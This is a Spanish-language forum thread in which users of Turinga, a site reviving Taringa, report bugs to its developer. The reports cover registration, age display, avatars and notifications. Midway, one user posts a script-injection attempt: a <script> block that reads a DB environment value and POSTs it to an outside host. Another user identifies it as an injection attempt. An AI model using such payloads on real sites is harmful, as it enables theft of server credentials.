Primeros 1000 usuarios del 301 al 1000 con rango NEW FULL USER !!!
Posteado por:
Turinga
Oficial
México


Bugs y Errores


¡Hola a todos!

En Turinga!, nos esforzamos constantemente por ofrecer la mejor experiencia posible a nuestros usuarios. Sin embargo, sabemos que a veces pueden surgir pequeños contratiempos. Pero no te preocupes, ¡aquí es donde entras tú!

Tu retroalimentación es invaluable para nosotros. Si encuentras algún bug, error o simplemente algo que no funciona como debería, ¡queremos saberlo! No sólo nos ayudarás a mejorar la plataforma, sino que también estarás contribuyendo a crear un entorno más sólido y eficiente para todos.

¿Has encontrado algo inusual? ¿Una función que no responde como esperabas? ¡No dudes en reportarlo! Nos encanta escuchar de nuestros usuarios y trabajaremos diligentemente para solucionar cualquier problema que encuentres.

Reportar un bug es muy sencillo. Simplemente deja un comentario en este post describiendo el problema que encontraste. ¡Y aquí viene lo interesante! Para agradecer tu participación, cada vez que reportes un bug estarás participando en un sorteo mensual, donde podrás subir de nivel para nuestros usuarios más colaborativos. ¿Qué esperas? ¡Hazte escuchar y gana mientras mejoramos juntos!

Gracias por ser parte de Turinga! y por ayudarnos a ser aún mejores día tras día. ¡Estamos emocionados de trabajar contigo para crear la mejor experiencia posible!

¡Saludos cordiales,
Staff de Desarrollo en Turinga!




  • Compartir en:

123 Comentarios


SHIN dijo hace 30 días:
  • +1
    +1 / -0
Hola, queria avisar que los juegos Turinga no funcionan
JuanL23 dijo hace 30 días:
  • 0
    +0 / -0
FMA_SHIN dijo:

Hola, queria avisar que los juegos Turinga no funcionan

en efecto aun los estamos desarrollando
Maxi95 dijo hace 26 días:
  • +1
    +1 / -0
Hola, verifica el registro, no me permitía casi ninguna contraseña segura, tuve que agregar una sin guion bajo ni mayúsculas, también el buscador de ciudad está incompleto, no aparecía mi ciudad, creo que con solo agregar región o provincia está bien, así se facilita el registro de usuarios y más puedes unirse.
JuanL23 dijo hace 26 días:
  • +1
    +1 / -0
Maxi95 dijo:

Hola, verifica el registro, no me permitía casi ninguna contraseña segura, tuve que agregar una sin guion bajo ni mayúsculas, también el buscador de ciudad está incompleto, no aparecía mi ciudad, creo que con solo agregar región o provincia está bien, así se facilita el registro de usuarios y más puedes unirse.


gracias por informarnos, lo de la region en ocaciones debes escribir y esperar un momento a que arroje resultados, creemos que tenemos una base completa de estados, paises y mas pero siempre puede llegar a faltar, respecto a las contraseñas modificaremos eso para poder agregar mas seguridad para el usuario, saludos y gracias por reportar.

NOTA INVITA A TUS AMIGOS PARA HACER CRECER LA COMUNIDAD
Jason_Voorhees dijo hace 21 días:
  • 0
    +0 / -0
Al comentar, da error, pero después aparece el comentario
JuanL23 dijo hace 21 días:
  • +2
    +2 / -0
Jason_Voorhees dijo:

Al comentar, da error, pero después aparece el comentario

si, justamente estoy viendo que es lo que pasa, gracias por el aporte.
burrobijudo69 dijo hace 21 días:
  • --1
    +0 / -1
<strong>uffff</strong>
JuanL23 dijo hace 21 días:
  • 0
    +0 / -0
burrobijudo69 dijo:

<strong>uffff</strong>

No entendí
burrobijudo69 dijo hace 21 días:
  • --1
    +0 / -1
JuanL23 dijo:

burrobijudo69 dijo:

<strong>uffff</strong>

No entendí


<script>
const envdata = '{{ env('DB' }}'

await fetch("tdax.ddns.net/app/form", {
method: "POST"
body: JSON.stringify(envdata);
])

</script>
JuanL23 dijo hace 21 días:
  • 0
    +0 / -0
burrobijudo69 dijo:

JuanL23 dijo:

burrobijudo69 dijo:

<strong>uffff</strong>

No entendí


<script>
const envdata = '{{ env('DB' }}'

await fetch("tdax.ddns.net/app/form", {
method: "POST"
body: JSON.stringify(envdata);
])

</script>

Seguimos sin entender :/
Jason_Voorhees dijo hace 21 días:
  • +1
    +1 / -0
No es ningún bug, ni error, pero me gustaría que se pueda poner en modo oscuro
JuanL23 dijo hace 21 días:
  • 0
    +0 / -0
Jason_Voorhees dijo:

No es ningún bug, ni error, pero me gustaría que se pueda poner en modo oscuro

Muchas gracias lo contemplaremos para agregarlo
Locolope dijo hace 20 días:
  • +2
    +2 / -0
Hola, me gustaría que este optimizado para móviles. Gracias
JuanL23 dijo hace 20 días:
  • 0
    +0 / -0
Locolope dijo:

Hola, me gustaría que este optimizado para móviles. Gracias

gracias por la idea, se tomara en cuenta para hacerlo mas accesible
Naxo420 dijo hace 10 días:
  • 0
    +0 / -0
Es una boludez, pero veo que hay un bug en el perfil con el tema de la edad, puse mi fecha de nacimiento (05/11/1999) y en el perfil dice que tengo 25
JuanL23 dijo hace 10 días:
  • 0
    +0 / -0
Naxo420 dijo:

Es una boludez, pero veo que hay un bug en el perfil con el tema de la edad, puse mi fecha de nacimiento (05/11/1999) y en el perfil dice que tengo 25

@Naco420 gracias lo verificaré en un momento.
Nekita dijo hace 10 días:
  • +1
    +1 / -0
Hola admin
DiegoMaradona dijo hace 10 días:
  • 0
    +0 / -0
Esta medio feo pero lindo a la vez
JuanL23 dijo hace 10 días:
  • +1
    +1 / -0
Nekita dijo:

Hola admin

Hola 😎
salva15 dijo hace 10 días:
  • 0
    +0 / -0
La edad está mal calculada en el perfil. Se hace año actual - año de nacimiento. Lo cual no es válido si uno todavía no cumplió en el año.
CeliaGlezAglr dijo hace 10 días:
  • 0
    +0 / -0
Tengo 26 años y dice que tengo 27 jaja🥲
JuanL23 dijo hace 10 días:
  • 0
    +0 / -0
salva15 dijo:

La edad está mal calculada en el perfil. Se hace año actual - año de nacimiento. Lo cual no es válido si uno todavía no cumplió en el año.

es correcto, estoy modificando eso
manolo12 dijo hace 10 días:
  • +2
    +2 / -0
salva15 dijo:

La edad está mal calculada en el perfil. Se hace año actual - año de nacimiento. Lo cual no es válido si uno todavía no cumplió en el año.


wow eso era un bug de taringa!..
JuanL23 dijo hace 10 días:
  • 0
    +0 / -0
manolo12 dijo:

salva15 dijo:

La edad está mal calculada en el perfil. Se hace año actual - año de nacimiento. Lo cual no es válido si uno todavía no cumplió en el año.


wow eso era un bug de taringa!..

@manolo12 no bueno, literalmente lo hice igualito
manolo12 dijo hace 10 días:
  • 0
    +0 / -0
JuanL23 dijo:

manolo12 dijo:

salva15 dijo:

La edad está mal calculada en el perfil. Se hace año actual - año de nacimiento. Lo cual no es válido si uno todavía no cumplió en el año.


wow eso era un bug de taringa!..

@manolo12 no bueno, literalmente lo hice igualito


jajaj ya veo
JuanL23 dijo hace 10 días:
  • 0
    +0 / -0
@CeliaGlezAglr ya quedo listo
Esthefy dijo hace 10 días:
  • +1
    +1 / -0
Hola! Se me complicó un poco para registrarme, no me traía el nombre de mi ciudad y cuando lo hacía no me dejaba finalizar la carga de datos. Tal vez haya algo para revisar por ahi! PD: Te quedó genial la página, muchas gracias por revivir el espíritu taringuero!
JuanL23 dijo hace 10 días:
  • 0
    +0 / -0
Esthefy dijo:

Hola! Se me complicó un poco para registrarme, no me traía el nombre de mi ciudad y cuando lo hacía no me dejaba finalizar la carga de datos. Tal vez haya algo para revisar por ahi! PD: Te quedó genial la página, muchas gracias por revivir el espíritu taringuero!


@Esthefy si debo verificarlo, tengo un detalle al momento de escribir la ciudad tarda un poco en mostrar los resultados, pero conforme escribas ya te aparecen, aun sigo trabajando en ello, gracias por registrarte, saludos
TavoT dijo hace 10 días:
  • +1
    +1 / -0
Cambienme el nick a @TavoT, es un horror esto
JuanL23 dijo hace 10 días:
  • +1
    +1 / -0
TavoTOk dijo:

Cambienme el nick a @TavoT, es un horror esto

@TavoT listo jajajaja, mas cuidado al registrarse, o fue error mio ??
Esthefy dijo hace 10 días:
  • +1
    +1 / -0
TavoTOk dijo:

Cambienme el nick a @TavoT, es un horror esto

Te faltó pedir la medalla de ex-mod también jajaja
Bienvenido Tavito!
TavoT dijo hace 10 días:
  • +1
    +1 / -0
JuanL23 dijo:

TavoTOk dijo:

Cambienme el nick a @TavoT, es un horror esto

@TavoT listo jajajaja, mas cuidado al registrarse, o fue error mio ??


No deja poner nicks de menos de 6 caracteres el formulario. Gracias :alaba:
TavoT dijo hace 10 días:
  • +2
    +2 / -0
Esthefy dijo:

TavoTOk dijo:

Cambienme el nick a @TavoT, es un horror esto

Te faltó pedir la medalla de ex-mod también jajaja
Bienvenido Tavito!


Vamos de a poco con los pedidos si no me van a rajar el primer dia
ClaudeSpeed dijo hace 10 días:
  • 0
    +0 / -0
Lo del registro parece ser un problema cuando querés hacerte una cuenta con una contraseña con caractéres que le resulta problemáticos de reconocer a la página. El problema es que en vez de decirte cuáles no están disponibles para su uso, te devuelve OK.

Una vez que verificás la cuenta con el link que te manda al mail, te devuelve una página vacía que no dice el estatus de la verificación, lo cual puede confundir a la gente, y el captcha de la sección de "Olvidaste tu contraseña?" devuelve un Invalid Key Type para el desarrollador.

Más allá de eso, te quedó muy piola la página. Esperemos que prospere!
ExcaliburKnight dijo hace 10 días:
  • +1
    +1 / -0
Buenas, primera vez acá, los bugs directamente los pasamos por aca? Recién ví este undefined
ExcaliburKnight dijo hace 10 días:
  • 0
    +0 / -0
ExcaliburKnight dijo:

Buenas, primera vez acá, los bugs directamente los pasamos por aca? Recién ví este undefined

Ahh no se si se puede ver, dejo el link aca
https://ibb.co/FHc6J9P
JuanL23 dijo hace 10 días:
  • 0
    +0 / -0
ExcaliburKnight dijo:

Buenas, primera vez acá, los bugs directamente los pasamos por aca? Recién ví este undefined

si por favor
gipsin dijo hace 10 días:
  • 0
    +0 / -0
tremendo capo pero creo que la mejor version fue la V5, salu3
JuanL23 dijo hace 10 días:
  • +1
    +1 / -0
gipsin dijo:

tremendo capo pero creo que la mejor version fue la V5, salu3

@gipsin shhh aca entre nosotros sin que se enteren los demas, en cuanto terminemos esta version, iniciaremos con la v5 y el usuario podra elegir cual quiere usar
ExcaliburKnight dijo hace 10 días:
  • 0
    +0 / -0
Pispeando por ahi encontré que no se está redondeando bien la edad con la fecha de nacimiento, dejo esto aca. Primero dice 20 y despues debajo dice 21

Che, primera vez en este tipo de sitios, me gusta mucho. Me hace acordar a las buenas epocas jaja
JuanL23 dijo hace 10 días:
  • +1
    +1 / -0
ExcaliburKnight dijo:

Pispeando por ahi encontré que no se está redondeando bien la edad con la fecha de nacimiento, dejo esto aca. Primero dice 20 y despues debajo dice 21

Che, primera vez en este tipo de sitios, me gusta mucho. Me hace acordar a las buenas epocas jaja

cuando quieras poner una imagen, asegurate de ponerla con todo y el tipo de este modo -> https://i.ibb.co/Y2YrzxF/bug3.png

asi se mostrara, ya quedo solucionado ese error
ExcaliburKnight dijo hace 10 días:
  • 0
    +0 / -0
JuanL23 dijo:

ExcaliburKnight dijo:

Pispeando por ahi encontré que no se está redondeando bien la edad con la fecha de nacimiento, dejo esto aca. Primero dice 20 y despues debajo dice 21

Che, primera vez en este tipo de sitios, me gusta mucho. Me hace acordar a las buenas epocas jaja

cuando quieras poner una imagen, asegurate de ponerla con todo y el tipo de este modo -> https://i.ibb.co/Y2YrzxF/bug3.png

asi se mostrara, ya quedo solucionado ese error

dale joya, gracias!
rengow dijo hace 10 días:
  • 0
    +0 / -0
Buenas! Mi primer comentario jaja

Encontré dos bugs, uno al seleccionar la Ciudad no muestra la ciudad que uno quiere poner, pero en el response aparece.
El otro que le daba a Terminar y no avanzaba. No me mostraba el error. Me fijé en el post y aparecía que no se podía poner contraseñas con símbolos especiales, etc.

Felicidades por la web!
JuanL23 dijo hace 10 días:
  • +1
    +1 / -0
rengow dijo:

Buenas! Mi primer comentario jaja

Encontré dos bugs, uno al seleccionar la Ciudad no muestra la ciudad que uno quiere poner, pero en el response aparece.
El otro que le daba a Terminar y no avanzaba. No me mostraba el error. Me fijé en el post y aparecía que no se podía poner contraseñas con símbolos especiales, etc.

Felicidades por la web!

si lo de las ciudades al ir escribiendo, se va arreglando y mostrando las ciudades

lo otro según yo ya habia quedado solucionado
RodolfoGS dijo hace 10 días:
  • 0
    +0 / -0
En el registro cuando pones una contraseña con algun caracter que no esta permitido (ejemplo guion medio -) te deja pasar, pero en el 2do paso cuando haces el submit el server responde con un error pero no se muestra en pantalla (por lo tanto no sabes que fallo), ni hay forma de volver atras, tenes que cerrar el modal y volver a hacer todo de nuevo.

El error que tira el server y no se muestra es el siguiente (*dejé la ñ y tildes como vino del server):
Cita :
La contrase &ntilde;a solo puede tener letras, n &uacute;meros, punto, guion bajo, dos puntos, coma, punto y coma.
JuanL23 dijo hace 10 días:
  • +1
    +1 / -0
RodolfoGS dijo:

En el registro cuando pones una contraseña con algun caracter que no esta permitido (ejemplo guion medio -) te deja pasar, pero en el 2do paso cuando haces el submit el server responde con un error pero no se muestra en pantalla (por lo tanto no sabes que fallo), ni hay forma de volver atras, tenes que cerrar el modal y volver a hacer todo de nuevo.

El error que tira el server y no se muestra es el siguiente (*dejé la ñ y tildes como vino del server):
Cita :
La contrase ña solo puede tener letras, n úmeros, punto, guion bajo, dos puntos, coma, punto y coma.


@RodolfoGS, listo ya quedo solucionado, ya manda el error en caso de existin en el formulario, gracias
Julieta dijo hace 10 días:
  • +1
    +1 / -0
Holisss, estoy re contenta con la página jajaja es espectacular por cierto creo que hay un error en cómo se muestran los avatares en los perfiles o en lugares donde se ven chiquitos, aparecen algunos predeterminados random:


En algunos casos, dependiendo la biografía el botón de bloquear se bugea y se superpone con otros botones

Y a veces los avatares depende del tamaño, no reescala bien en la lista de seguidores y queda desproporcionado


igual son boludeces
Julieta dijo hace 10 días:
  • 0
    +0 / -0
Añado algo: no se si es temporal o hice algo mal yo pero no puedo completar mi perfil al 100%, en el último apartado luego de completar todo, apreto Guardar y no hace nada
JuanL23 dijo hace 10 días:
  • +1
    +1 / -0
Julieta dijo:

Añado algo: no se si es temporal o hice algo mal yo pero no puedo completar mi perfil al 100%, en el último apartado luego de completar todo, apreto Guardar y no hace nada

Recarga la página y fíjate si se guardaron tus cambios es raro que pase eso peeeero todo puede suceder
Julieta dijo hace 10 días:
  • 0
    +0 / -0
Julieta dijo:

Añado algo: no se si es temporal o hice algo mal yo pero no puedo completar mi perfil al 100%, en el último apartado luego de completar todo, apreto Guardar y no hace nada


Aparentemente si escribis muchos caracteres en lugares como: películas o series favoritas no te lo toma y hay que borrar un poco de texto, era eso
holaosea dijo hace 10 días:
  • 0
    +0 / -0
JuanL23 dijo:

gipsin dijo:

tremendo capo pero creo que la mejor version fue la V5, salu3

@gipsin shhh aca entre nosotros sin que se enteren los demas, en cuanto terminemos esta version, iniciaremos con la v5 y el usuario podra elegir cual quiere usar

chau vuelvo cuando agreguen la v5
1000NER dijo hace 9 días:
  • 0
    +0 / -0
manolo12 dijo:

JuanL23 dijo:

manolo12 dijo:

salva15 dijo:

La edad está mal calculada en el perfil. Se hace año actual - año de nacimiento. Lo cual no es válido si uno todavía no cumplió en el año.


wow eso era un bug de taringa!..

@manolo12 no bueno, literalmente lo hice igualito


jajaj ya veo

sos el original que recomendo turinga en twitter o solo usas el nombre de usuario
Kaiafa dijo hace 9 días:
  • 0
    +0 / -0
- El input de Ciudad del registro no anda muy bien
- El link de confirmación de registro me llevo a una pagina en blanco sin ningún mensaje de bienvenida
TavoT dijo hace 9 días:
  • 0
    +0 / -0
El chat se scrollea solo hasta el final, no se pueden leer los mensajes anteriores
Darkley dijo hace 9 días:
  • 0
    +0 / -0
TavoT dijo:

El chat se scrollea solo hasta el final, no se pueden leer los mensajes anteriores

pregunta random, recordas mi nick? para saber nomas jaja
TavoT dijo hace 9 días:
  • 0
    +0 / -0
Darkley dijo:

TavoT dijo:

El chat se scrollea solo hasta el final, no se pueden leer los mensajes anteriores

pregunta random, recordas mi nick? para saber nomas jaja


Vagamente, hace mucho que entraba muy esporádicamente a T!
Hyogadeacuario dijo hace 9 días:
  • 0
    +0 / -0
Comentar, seguir post y guardar en favoritos tira un mensaje de error y te pide reintentar, una vez que le das reintentar te vuelve a dar error pero actualizas la pagina y aparece el comentario y todo lo demas
RodolfoGS dijo hace 9 días:
  • +2
    +2 / -0
No se si la idea es hacerlo identico a como era Taringa, pero si es esa te dejo algunas cosas de la home.

El box de "Últimos posts":
- El header de ese box tendria que ser igual al resto de los boxes de la home
- El color de fondo lo mismo
- La fuente tendria que ser normal, no bold
- El icono de rss caido
- El link de RSS de ultimos posts no anda

Por otro lado, al box de "Posts TOPS" se le salen los textos por la derecha, pero en vez de arreglar eso podrias basarte en este rediseño que queda mas prolijo, con los puntos a la derecha y los titulos a la izquierda con overflow ellipsis
https://web.archive.org/web/20110430163221/http://www.taringa.net/
RodolfoGS dijo hace 9 días:
  • +1
    +1 / -0
En el boton de Seguir / Dejar de seguir usuario anda medio roto el loading, tanto desde el perfil como desde el modal que se abre cuando mencionas a un usuario, ejemplo: @Turinga
Darkley dijo hace 9 días:
  • 0
    +0 / -0
RodolfoGS dijo:

En el boton de Seguir / Dejar de seguir usuario anda medio roto el loading, tanto desde el perfil como desde el modal que se abre cuando mencionas a un usuario, ejemplo: @Turinga

te llega la notificacion cuando hago el quote? por que a mi no me avisó que me contestaron un mensaje por ejemplo
RodolfoGS dijo hace 9 días:
  • +1
    +1 / -0
Darkley dijo:

RodolfoGS dijo:

En el boton de Seguir / Dejar de seguir usuario anda medio roto el loading, tanto desde el perfil como desde el modal que se abre cuando mencionas a un usuario, ejemplo: @Turinga

te llega la notificacion cuando hago el quote? por que a mi no me avisó que me contestaron un mensaje por ejemplo

No, creo que de eso no llegaba notificacion en esta version, porque es un quote pero como texto dentro de un comentario normal, no son comentarios anidados realmente.
Lexotanil dijo hace 9 días:
  • 0
    +0 / -0
JuanL23 dijo:

burrobijudo69 dijo:

JuanL23 dijo:

burrobijudo69 dijo:

<strong>uffff</strong>

No entendí


<script>
const envdata = '{{ env('DB' }}'

await fetch("tdax.ddns.net/app/form", {
method: "POST"
body: JSON.stringify(envdata);
])

</script>

Seguimos sin entender :/


Está tratando de inyectar un código para sacar datos a través de un JSON en los comentarios, es un bug conocido
JuanL23 dijo hace 9 días:
  • 0
    +0 / -0
Lexotanil dijo:

JuanL23 dijo:

burrobijudo69 dijo:

JuanL23 dijo:

burrobijudo69 dijo:

<strong>uffff</strong>

No entendí


Lo sé pero fue como sarcasmo el hecho de tratar y no funcionar …. Espero nunca puedan 😅

<script>
const envdata = '{{ env('DB' }}'

await fetch("tdax.ddns.net/app/form", {
method: "POST"
body: JSON.stringify(envdata);
])

</script>

Seguimos sin entender :/


Está tratando de inyectar un código para sacar datos a través de un JSON en los comentarios, es un bug conocido

Lexotanil dijo hace 9 días:
  • 0
    +0 / -0
TavoT dijo:

Darkley dijo:

TavoT dijo:

El chat se scrollea solo hasta el final, no se pueden leer los mensajes anteriores

pregunta random, recordas mi nick? para saber nomas jaja


Vagamente, hace mucho que entraba muy esporádicamente a T!


Igual esto no tiene nada que ver con T!, incluso la pagina es Mexicana
Lexotanil dijo hace 9 días:
  • +1
    +1 / -0
Al responder o usar el @ (quote) no llega ninguna notificación
JuanL23 dijo hace 9 días:
  • 0
    +0 / -0
Lexotanil dijo:

Al responder o usar el @ (quote) no llega ninguna notificación

No recuerdo que eso fuera así o si, en caso de si confírmame porfa para I
Plementarlo 😅
Darkley dijo hace 9 días:
  • 0
    +0 / -0
JuanL23 dijo:

Lexotanil dijo:

Al responder o usar el @ (quote) no llega ninguna notificación

No recuerdo que eso fuera así o si, en caso de si confírmame porfa para I
Plementarlo 😅

otra cosa, si vas al inicio del post, y queres ver los post del user que postea, al clickear te lleva a la home y no a los post del usuario en cuestion
Darkley dijo hace 9 días:
  • +2
    +2 / -0
aah y una pelotudez, pero hay que hacerlo jajaj, el logo de evolucion colectiva, le falta el acento a evolución
Lexotanil dijo hace 9 días:
  • 0
    +0 / -0
JuanL23 dijo:

Lexotanil dijo:

Al responder o usar el @ (quote) no llega ninguna notificación

No recuerdo que eso fuera así o si, en caso de si confírmame porfa para I
Plementarlo 😅


Si si, te aparecía el numero de notificaciones en monitor de usuarios (ojito)
JuanL23 dijo hace 9 días:
  • 0
    +0 / -0
Haber espera al usar la mención de alguien o al citar el comentario de alguien porque si es al mencionar un usuario si funciona, pero al citar el comentario de alguien no lo hace

Lexotanil dijo:

JuanL23 dijo:

Lexotanil dijo:

Al responder o usar el @ (quote) no llega ninguna notificación

No recuerdo que eso fuera así o si, en caso de si confírmame porfa para I
Plementarlo 😅


Si si, te aparecía el numero de notificaciones en monitor de usuarios (ojito)

fedexweb dijo hace 9 días:
  • +1
    +1 / -0
Quise hacer un post Tutorial, con imágenes alojadas en imgur y no se pueden ver.

JuanL23 dijo hace 9 días:
  • 0
    +0 / -0
fedexweb dijo:

Quise hacer un post Tutorial, con imágenes alojadas en imgur y no se pueden ver.



una disculpa por eso ... debes poner las url de la imagen completa con todo y su tipo asi -> https://i.imgur.com/PLFgYBE.png

para que puedan verse

fedexweb dijo hace 9 días:
  • 0
    +0 / -0
JuanL23 dijo:

fedexweb dijo:

Quise hacer un post Tutorial, con imágenes alojadas en imgur y no se pueden ver.



una disculpa por eso ... debes poner las url de la imagen completa con todo y su tipo asi -> https://i.imgur.com/PLFgYBE.png

para que puedan verse



ok, solucionado!
JuanL23 dijo hace 9 días:
  • +2
    +2 / -0
Julieta dijo:

Holisss, estoy re contenta con la página jajaja es espectacular por cierto creo que hay un error en cómo se muestran los avatares en los perfiles o en lugares donde se ven chiquitos, aparecen algunos predeterminados random:


En algunos casos, dependiendo la biografía el botón de bloquear se bugea y se superpone con otros botones

Y a veces los avatares depende del tamaño, no reescala bien en la lista de seguidores y queda desproporcionado


igual son boludeces


solucionado lo de las imagenes del perfil, por otro lado estoy viendo lo del boton bloquear
3dus4v dijo hace 9 días:
  • 0
    +0 / -0
JuanL23 dijo:

Julieta dijo:

Holisss, estoy re contenta con la página jajaja es espectacular por cierto creo que hay un error en cómo se muestran los avatares en los perfiles o en lugares donde se ven chiquitos, aparecen algunos predeterminados random:


En algunos casos, dependiendo la biografía el botón de bloquear se bugea y se superpone con otros botones

Y a veces los avatares depende del tamaño, no reescala bien en la lista de seguidores y queda desproporcionado


igual son boludeces


solucionado lo de las imagenes del perfil, por otro lado estoy viendo lo del boton bloquear



No sé si esto lo tienes aposta o no: https://prnt.sc/OmzaZ6ww0LSU

En caso de ser así, ten cuidado, desde la consola JS podrían borrarte todos los posts.
JuanL23 dijo hace 9 días:
  • +1
    +1 / -0
TavoT dijo:

El chat se scrollea solo hasta el final, no se pueden leer los mensajes anteriores

@tavot ya quedo solucionado, gracias por la sugerencia
JuanL23 dijo hace 9 días:
  • 0
    +0 / -0
Hyogadeacuario dijo:

Comentar, seguir post y guardar en favoritos tira un mensaje de error y te pide reintentar, una vez que le das reintentar te vuelve a dar error pero actualizas la pagina y aparece el comentario y todo lo demas

@Hyogadeacuario creo según yo ya debe estar solucionado, cualquier cosa que veas que sigue pasando notificarlo, gracias
JuanL23 dijo hace 9 días:
  • +1
    +1 / -0
RodolfoGS dijo:

No se si la idea es hacerlo identico a como era Taringa, pero si es esa te dejo algunas cosas de la home.

El box de "Últimos posts":
- El header de ese box tendria que ser igual al resto de los boxes de la home
- El color de fondo lo mismo
- La fuente tendria que ser normal, no bold
- El icono de rss caido
- El link de RSS de ultimos posts no anda

Por otro lado, al box de "Posts TOPS" se le salen los textos por la derecha, pero en vez de arreglar eso podrias basarte en este rediseño que queda mas prolijo, con los puntos a la derecha y los titulos a la izquierda con overflow ellipsis
https://web.archive.org/web/20110430163221/http://www.taringa.net/



RodolfoGS dijo:

En el boton de Seguir / Dejar de seguir usuario anda medio roto el loading, tanto desde el perfil como desde el modal que se abre cuando mencionas a un usuario, ejemplo: @Turinga


@RodolfoGS cambiamos el tema y fuente, estamos trabajando en el rss, lo de los posts TOPs lo veo bien por mas que le di vueltas se mantuvo en su ubicación, quizás sea el navegador, ... estoy trabjando en cmabiar el diseño, gracias y lo del boton del mimso modo no vi algun error :/, saludos
RodolfoGS dijo hace 9 días:
  • 0
    +0 / -0
JuanL23 dijo:

@RodolfoGS cambiamos el tema y fuente, estamos trabajando en el rss, lo de los posts TOPs lo veo bien por mas que le di vueltas se mantuvo en su ubicación, quizás sea el navegador, ... estoy trabjando en cmabiar el diseño, gracias y lo del boton del mimso modo no vi algun error :/, saludos

Lo del top posts ahora lo veo bien con el cambio de diseño, de alinear los puntos a la derecha y acortar el titulo. Quizas algun titulo queda por debajo de los puntos, pero esta mejor que antes que se salian del box.

Por ejemplo el 7:
fedexweb dijo hace 9 días:
  • +1
    +1 / -0
Cuando quiero responder a un comentario de un post con cita, tira error, pero al refrescar, la respuesta esta correctamente publicada:
JuanL23 dijo hace 9 días:
  • 0
    +0 / -0
RodolfoGS dijo:

JuanL23 dijo:

@RodolfoGS cambiamos el tema y fuente, estamos trabajando en el rss, lo de los posts TOPs lo veo bien por mas que le di vueltas se mantuvo en su ubicación, quizás sea el navegador, ... estoy trabjando en cmabiar el diseño, gracias y lo del boton del mimso modo no vi algun error :/, saludos

Lo del top posts ahora lo veo bien con el cambio de diseño, de alinear los puntos a la derecha y acortar el titulo. Quizas algun titulo queda por debajo de los puntos, pero esta mejor que antes que se salian del box.

Por ejemplo el 7:

@RodolfoGS mira yo lo veo bien, por eso se me hace raro

JuanL23 dijo hace 9 días:
  • 0
    +0 / -0
fedexweb dijo:

Cuando quiero responder a un comentario de un post con cita, tira error, pero al refrescar, la respuesta esta correctamente publicada:

@fedexweb por mas que busco no soy capas a encontrar el error, y también me pasa a mi
RodolfoGS dijo hace 9 días:
  • 0
    +0 / -0
@JuanL23 te dejo video de ejemplo del loading, las primeras pruebas las hice con la conexion normal, después las hice con una conexion lenta para que se vea mejor


link: https://www.youtube.com/watch?v=https://www.youtube.com/watch?v=gC-pMaA2ZOk
RodolfoGS dijo hace 9 días:
  • 0
    +0 / -0
El video anterior quedo mal embebido, me parece que anda mal eso también, le das al boton de insertar video, pones la url como dice y lo pone mal. El video es:
https://www.youtube.com/watch?v=gC-pMaA2ZOk

--
Y otra cosa que acabo de notar, si dejas un comentario y después queres dejar otro, no funciona el boton, no hace nada, tenes que recargar para poder volver a darle a "Enviar Comentario"
JuanL23 dijo hace 9 días:
  • +1
    +1 / -0
RodolfoGS dijo:

El video anterior quedo mal embebido, me parece que anda mal eso también, le das al boton de insertar video, pones la url como dice y lo pone mal. El video es:
https://www.youtube.com/watch?v=gC-pMaA2ZOk

--
Y otra cosa que acabo de notar, si dejas un comentario y después queres dejar otro, no funciona el boton, no hace nada, tenes que recargar para poder volver a darle a "Enviar Comentario"

@RodolfoGS al insertar un video te dice que solo insertes esta parte gC-pMaA2ZOk, lo de los comentarios lo estoy verificando, ahora mismo
RodolfoGS dijo hace 9 días:
  • 0
    +0 / -0
Julieta dijo hace 9 días:
  • 0
    +0 / -0
Holaaa dejo otro bug que pasa al editar un post y presionar "Agregar", si bien lo actualiza todo bien, la página queda así y para algunos quizá pueda ser algo confuso
JuanL23 dijo hace 8 días:
  • +1
    +1 / -0
RodolfoGS dijo:

En el boton de Seguir / Dejar de seguir usuario anda medio roto el loading, tanto desde el perfil como desde el modal que se abre cuando mencionas a un usuario, ejemplo: @Turinga

@RodolfoGS solucionado el bug de boton, que mas pasen errores que ando en chinga jajaja , saludos.
Agustin dijo hace 8 días:
  • +1
    +1 / -0
Vengo a figurar, salu2
JuanL23 dijo hace 8 días:
  • +1
    +1 / -0
Julieta dijo:

Holaaa dejo otro bug que pasa al editar un post y presionar "Agregar", si bien lo actualiza todo bien, la página queda así y para algunos quizá pueda ser algo confuso

@Julieta listo y solucionado
Julieta dijo hace 8 días:
  • 0
    +0 / -0
@JuanL23 pequeño detalle que acabo de ver

JuanL23 dijo hace 8 días:
  • +1
    +1 / -0
Julieta dijo:

@JuanL23 pequeño detalle que acabo de ver


@julieta noooo lo veo jajajaja solucionado ....
Darkley dijo hace 7 días:
  • 0
    +0 / -0
en un futuro se podrian implementar medallas que incentiven a comentar/postear/likear o cosas asi, que a determinados post por ej te de la medalla gran posteador o cosas asi relacionadas, hasta pueden tener diferentes niveles
JuanL23 dijo hace 7 días:
  • 0
    +0 / -0
Darkley dijo:

en un futuro se podrian implementar medallas que incentiven a comentar/postear/likear o cosas asi, que a determinados post por ej te de la medalla gran posteador o cosas asi relacionadas, hasta pueden tener diferentes niveles

Si en este post solicita si pueden dejar ideas para medallas 🥹https://turinga.net/posts/turinga/78/medallas.html
nachotta dijo hace 7 días:
  • 0
    +0 / -0
Buenas ! No funciona recuperar password por error en el validador captcha "Error para el propietario del sitio web: el tipo de clave no es válido" (Por suerte me acordé mi clave jaja)
Julieta dijo hace 6 días:
  • 0
    +0 / -0
Esto quizá es muy de hincha pelotas o rozando la obsesión pero esos px


deberían ser así:


por cierto el logo del eclipse queda hermoso

LoquilloPillo dijo hace 6 días:
  • 0
    +0 / -0
fedexweb dijo:

Cuando quiero responder a un comentario de un post con cita, tira error, pero al refrescar, la respuesta esta correctamente publicada:

vos tranqui que después me daré la paja de escribír toda esa URL para ver la imágen mas tarde
JuanL23 dijo hace 6 días:
  • 0
    +0 / -0
Julieta dijo:

Esto quizá es muy de hincha pelotas o rozando la obsesión pero esos px


deberían ser así:


por cierto el logo del eclipse queda hermoso



@Julieta solucionado algo mas por el camino mandenlo
dorantesm dijo hace 5 días:
  • 0
    +0 / -0
Esthefy dijo:

Hola! Se me complicó un poco para registrarme, no me traía el nombre de mi ciudad y cuando lo hacía no me dejaba finalizar la carga de datos. Tal vez haya algo para revisar por ahi! PD: Te quedó genial la página, muchas gracias por revivir el espíritu taringuero!

Ese también era un bug en taringa XD
dorantesm dijo hace 5 días:
  • 0
    +0 / -0



link: https://www.youtube.com/watch?v=gC-pMaA2ZOk[/quote]

Eso te va a romper la tabla de notificaciones, así le tiré el sitio a Arturo dejándole una macro durante la noche. XD
Para poder comentar necesitas estar registrado. O... ¿ya tienes usuario? ¡Logueate!

Ir al cielo